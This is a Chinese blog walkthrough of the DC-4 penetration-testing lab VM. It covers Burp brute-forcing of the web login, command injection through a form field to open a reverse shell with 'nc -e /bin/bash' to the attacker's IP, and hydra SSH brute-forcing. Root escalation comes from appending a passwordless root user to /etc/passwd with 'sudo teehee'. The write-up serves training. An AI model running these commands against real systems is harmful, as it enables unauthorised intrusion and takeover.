Neos的渗透测试靶机练习——DC-4

已于 2024-01-09 14:43:38 修改
阅读量866 收藏 26
点赞数 24
分类专栏: 靶场练习 文章标签: 安全 渗透测试 网络安全 web安全 网络
于 2024-01-09 12:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38678845/article/details/135470020
版权
本文详细描述了一次针对DC-4的渗透实验,包括使用burpsuite进行暴力破解、寻找可反弹shell的点以及最终提权的过程,强调了学习渗透知识背后的原理和工具运用的重要性。
摘要由CSDN通过智能技术生成

DC-4

一、实验环境

虚拟机软件:VirtualBox
攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
靶机:DC-4(网卡初始为仅主机模式,要有安全意识)

二、开始渗透

1. 搜集信息

输入sudo su,将kali切换到root权限
切root权限
输入ifconfig查询自身ip,即攻击机ip
查自身ip
可以看到自身ip192.168.56.101,对应的网卡名称为eth0
本次渗透我们选择输入arp-scan -l扫描本网段存活主机,即靶机ip地址
靶机ip
可以看到靶机ip192.168.56.108,。
输入nmap -sV -p- 192.168.56.108,查看靶机端口开放信息
靶机端口
看到开放了80端口22端口
浏览器输入192.168.56.108:80。
网站页面
命令行输入whatweb -v 192.168.56.108查询网站指纹信息。
网站指纹
可以看到没什么信息,其中nginx是一个中间件,版本为1.15.10
命令行输入dirb http://192.168.56.108,查询网站目录
网站目录
可以看到也没什么关键信息,只能从登陆界面的用户名密码下手了。

2. 暴力破解用户名密码

通常情况下,用户名都会有名为adminadministrator等的管理员账户,我们选择kali自带的burpsuite进行爆破。
先在浏览器中设置一下代理信息
设置代理信息
信息需设置成与burpsuite中的信息相同。
burp设置
输入登录信息,通过抓包,将数据包内容送到Intruder模块
intruder模块
Intruder中的payload模块中,将kali中其他爆破软件自带的密码本,我这里选择的是/usr/share/john/password.lst中的内容导入payload setting中,记得把注释的字段去掉。
密码本导入
开始对密码字段进行爆破,
爆破密码
等待一段时间,爆破成功。
密码
密码为happy,用户名为admin,登陆网页。
login

3. 寻找可以反弹shell的点

点击Command,发现居然可以运行指令。
前端可以运行指令
再次burp抓包。
抓包带有指令的数据
送入Repeater模块中,点击Send,发现ls -l命令中间的空格为+
空格过滤为+
至此,可以通过修改radio字段的内容,反弹shell。
在命令行中输入nc -lvvp 4444,监听4444端口。
再将ls+-l修改为nc+-e+/bin/bash+192.168.56.101+4444,点击Send,反弹成功。
输入python -c "import pty;pty.spawn('/bin/bash')",转为交互式。
反弹shell
/home/jim/backups目录下发现了一个old-passwords.bak文件。
旧密码
怀疑有jim用户的密码,将其中的内容复制到本地的passwd.txt文件中,用kali自带的hydra进行爆破。
输入hydra -l jim -P passwd.txt ssh://192.168.56.108:22,等待一会儿,得到结果。
用户名密码
得到用户名jim的密码为jibril04
输入ssh jim@192.168.56.108 -p 22和密码登陆SSH。
ssh登陆
根据提示中的You have mail,进入/var/mail目录中,发现一封名为jim的邮件。
邮件内容
发现了用户名Charles的密码^xHhA&hvim0y,输入su charles和密码切换到charles用户。
charles用户

4. 提权

最后一般都是提权了,输入sudo -l查看可以以root权限执行的命令。
在这里插入图片描述
这里可以用teehee命令提权。
输入echo "neos::0:0:::/bin/bash" | sudo teehee -a /etc/passwdsu neos成功提权到root。
在这里插入图片描述
/root中发现flag.txt
flag
至此,渗透结束。

三、总结

每一次新的渗透都是一堆没学过的新的知识,希望大家能知其然,亦知其所以然,渗透结束了,可是其中大量的为什么需要你私下去思考并解决,学的只是思路,但是为什么这个思路,为什么用这个工具,还需要多多琢磨。

Dr.Neos
关注
  • 24
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
neos-simple-editor-extend:通过YAML-Configuration扩展Neos CKEditor的简单方法
05-14
composer require breadlesscode/neos-simple-editor-extend --no-update --no-update命令可防止自动更新依赖关系。 将软件包添加到主题composer.json后,请返回Neos安装的根目录并运行composer更新。 现
neos-normalize:@neos21neos-normalize
05-31
Neo 的标准化:@ neos21 / neos-normalize 基于Normalize.css的思想,制定与Windows、Mac、iOS最新浏览器的最小必要规范化样式。我们不会完全统一所有元素的样式,而是仅对经常使用的元素进行最小样式化。 演示 ...
DC4靶场渗透流程(超详细)
m0_64583632的博客
04-10 915
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标
【vulnhub】DC系列之DC-4渗透测试
Hi~ 土拨鼠
12-28 459
文章目录一、实验环境二、实验要求三、渗透过程 一、实验环境 目标靶机DC-4,NAT模式 攻击机:kali,NAT模式,IP:192.168.35.131 二、实验要求 拿到唯一一个flag就ok! 三、渗透过程 信息收集: 使用nmap扫描存活主机: nmap -sP 192.168.35.0/24 -oN nmap.sP 得到靶机IP:192.168.35.151 端口扫描及版本探测: nmap -sV 192.168.35.151 -O -p 1-65535 -oN nmap.sV 发现开放了
DC4靶机渗透测试
Huangshanyoumu的博客
04-16 647
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3856
DC-4靶机渗透测试详细教程
neos-development-collection:包含Neos核心软件包的统一存储库,用于Neos开发
05-12
贡献如果您想为Neos做出贡献并想建立一个开发环境,请按照以下步骤操作: composer create-project neos/neos-development-distribution neos-development dev-master --keep-vcs 请注意,您从中创建项目的-...
CM.Neos.ThemeModule:自定义支持的Neos主题
05-16
在您的站点包中运行composer require --no-update cm/neos-thememodule 在您的项目中运行composer update 。 如果没有安装该软件包,则因为您的站点软件包不是通过composer管理的,因此您需要在项目根目录中再次
neos-ui-extensibility-examples:Neos UI可扩展性示例
05-14
git clone git@github.com:neos/neos-ui-extensibility-examples.git Neos.Neos.Ui.ExtensibilityExamples cd ../../ ./flow flow:package:rescan 如何建立范例 目前,这些示例仅适用于纱线,不适用于NPM安装。 转...
DC-4 渗透测试
Darklord.W
04-14 1242
DC-4渗透测试 0x00实验环境 靶机DC-4,IP地址:192.168.8.135 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 Masscan以及nmap扫描 访问web端 扫描web目录 但是没有什么有价值的内容 尝试暴力破解 得到admin...
渗透测试靶机练习 DC-4
weixin_43705814的博客
01-14 505
渗透测试靶机练习 DC-4 一、靶机介绍 与之前的靶机是一个系列可在该网站下载搭建 链接:https://www.vulnhub.com/ 二、所需工具与思路 Namp:获取IP,端口以及详细信息 burp:爆破破解账号密码 nc反弹shell hydra爆破密码. 提权 三、渗透测试获取Flag 1.进行主机发现确认主机地址 nmap 192.168.1.0/24 2.对主机进行端口扫描获取详细信息 nmap -p- -A -sV -sS -O 192.168.1.104 开放了80和22端口,首先访
构建稳固与安全网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 763
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
企业如何保证公司内网安全
shunyou0526的博客
07-25 364
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1167
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 469
2024安全大模型技术与市场研究报告
CDGA|数据治理:安全如何贯穿数据供给、流通、使用全过程
最新发布
vx15302782362的博客
07-25 339
因此,数据治理的重要性日益凸显,它不仅仅是对数据的简单管理,更是确保数据在供给、流通和使用全过程中安全、合规、高效的关键。通过制定统一的数据标准和数据字典,对来自不同渠道的数据进行清洗、转换和整合,确保数据的一致性和可用性。首先,数据的收集必须遵循合法、合规的原则,确保数据来源的可靠性和数据的准确性。其次,在数据共享和交换过程中,要制定严格的共享规则和交换协议,明确数据的使用范围、使用期限和使用权限。同时,要建立数据共享和交换的审计机制,对共享和交换的数据进行追溯和监控,确保数据的安全和合规使用。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1052
大语言模型提示注入攻击安全风险分析报告下载
大语言模型(LLM)安全测评基准V1.0 发布版下载
cybtec的博客
07-25 788
大语言模型(LLM)安全测评基准V1.0 发布版下载
问题1 提出一个涉及20个节点的对称旅行推销员问题的陈述,定义一个距离矩阵。 写出所提问题的线性规划模型,解释变量、目标函数和约束条件的含义(你可以依靠AMPL模型)。 使用NEOS服务器,用Concorde解决这个问题。 用AMPL来解决这个问题。 进行计算研究,包括比较R算法 "two opt"、"nearest insertion"、"cheapest insertion "和 "repetitive nn "各运行10次,并提供每个目标值的最佳结果、最差结果、平均值和标准偏差。 考虑将你的问题限制在只有4个节点,并使用启发式反转算法解决它。
06-06
答案1:这是一个传统的对称性旅行推销员问题,其中有20个城市需要被访问,每个城市之间的距离是已知的。我们需要找到一条最短的路径,使旅行推销员能够访问每个城市一次并返回出发城市。我们可以使用一个20x20的距离矩阵来表示城市之间的距离。 线性规划模型如下: ``` minimize sum{i in 1..n, j in 1..n, i!=j} c[i,j] * x[i,j] subject to sum{j in 1..n, j!=i} x[i,j] = 1 for i in 1..n sum{i in 1..n, i!=j} x[i,j] = 1 for j in 1..n u[i] - u[j] + nx <= (n-1) * (1-x[i,j]) for i in 2..n, j in 2..n, i!=j 0 <= x[i,j] <= 1 for i in 1..n, j in 1..n, i!=j 2 <= u[i] <= n for i in 2..n u[1] = 1 ``` 其中,变量x[i,j]表示从城市i到城市j是否存在路径,c[i,j]表示从城市i到城市j的距离,u[i]表示第i个城市的顺序。目标函数是使得路径长度最短,约束条件分别是每个城市只能被访问一次,路径必须连通,以及顺序必须满足要求。 我们使用NEOS服务器上的Concorde来解决这个问题,得到最优解为26442.0。 然后,我们使用AMPL来解决这个问题,并比较四种启发式算法的表现。这四种算法分别是"two opt"、"nearest insertion"、"cheapest insertion"和"repetitive nn"。每个算法都运行10次,得到的结果如下: | Algorithm | Best | Worst | Average | Std Dev | | :-------: | :--: | :---: | :-----: | :-----: | | two opt | 28350 | 29869 | 29009.7 | 607.54 | | nearest insertion | 28265 | 29976 | 28858.5 | 604.81 | | cheapest insertion | 27692 | 29681 | 28466.3 | 622.18 | | repetitive nn | 28729 | 30163 | 29427.0 | 574.76 | 我们可以看到,最佳的结果是使用"cheapest insertion"算法得到的,其次是"repetitive nn"算法。"two opt"和"nearest insertion"算法的性能稍差。 最后,我们将问题限制为只有4个节点,并使用启发式反转算法来解决。我们得到的最优路径长度为10,最优路径为1-4-2-3-1。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值